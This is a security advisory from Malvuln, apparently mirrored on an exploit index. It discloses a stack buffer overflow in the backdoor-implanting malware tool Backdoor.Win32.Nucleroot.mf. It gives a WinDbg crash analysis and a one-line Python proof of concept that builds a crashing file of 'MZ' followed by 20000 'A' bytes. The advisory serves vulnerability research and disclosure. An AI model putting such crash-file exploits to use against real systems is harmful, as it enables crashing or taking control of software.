Exploit for Backdoor.Win32.Nucleroot.mf Buffer Overflow

Name: Exploit for Backdoor.Win32.Nucleroot.mf Buffer Overflow
Rating: 5 (83 reviews)
2021-12-13 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:165241
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32.Nucleroot.mf  
Vulnerability: Stack Buffer Overflow  
Description: Description: MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The Backdoor tool doesnt properly check the files it loads and falls victim to a file based local buffer overflow.  
Type: PE32  
MD5: 8de56eef118187a89eeab972288ce94d  
Vuln ID: MVID-2021-0420   
ASLR: False  
DEP: False  
Safe SEH: True  
Disclosure: 12/11/2021  
  
Memory Dump:  
(1790.60): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003  
eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400 ret 14h  
  
0:000> .ecxr  
eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8  
eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d  
Backdoor_Win32_Nucleroot_mf+0x90e3:  
004090e3 813850450000 cmp dword ptr [eax],4550h ds:002b:454e4141=????????  
  
0:000> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
  
FAULTING_IP:   
Backdoor_Win32_Nucleroot_mf+90e3  
004090e3 813850450000 cmp dword ptr [eax],4550h  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 454e4141  
Attempt to read from address 454e4141  
  
PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000000  
  
EXCEPTION_PARAMETER2: 454e4141  
  
READ_ADDRESS: 454e4141   
  
FOLLOWUP_IP:   
Backdoor_Win32_Nucleroot_mf+90e3  
004090e3 813850450000 cmp dword ptr [eax],4550h  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
FAULTING_THREAD: 00000060  
  
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141  
  
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141  
  
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141  
  
LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3  
0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2  
0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24  
0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690  
0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01  
0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d  
0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe  
0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f  
0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604  
0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604  
0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607  
0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0  
0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664  
0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615  
0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659  
0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982  
0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b  
0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655  
0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f  
0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f  
0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f  
0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33  
0042fcf0 00420d33 00690053 0065007a 0066004f Backdoor_Win32_Nucleroot_mf+0x20d4d  
0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33  
0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053  
0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a  
0042fd00 006d0049 00670061 00000065 00610042 0x66004f  
0042fd04 00670061 00000065 00610042 00650073 0x6d0049  
0042fd08 00000000 00610042 00650073 0066004f 0x670061  
  
  
STACK_COMMAND: ~0s; .ecxr ; kb  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: Backdoor_Win32_Nucleroot_mf  
  
IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74  
  
FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3  
  
  
Exploit/PoC:  
python -c "print( 'MZ'+'A'*20000)" > DOOM.exe  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).